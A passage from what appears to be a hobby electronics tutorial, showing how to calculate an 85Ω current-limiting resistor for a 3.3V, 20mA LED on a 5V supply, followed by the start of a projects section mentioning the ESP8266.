That means if you wanted to know what resistor to use with an LED that drops 3.3V and works at 20mA on a 5V power source: since the current is the same across the circuit, you divide the voltage drop across the resistor by the current. The resistor drops 1.7V in this circuit, as 3.3V is already being dropped by the LED, so (5-3.3)/0.02 tells you that you need a resistor that is 85Ω or close to that value.

Projects

Keep in mind these projects assume you have the parts kit linked at the top of the page.

ESP8266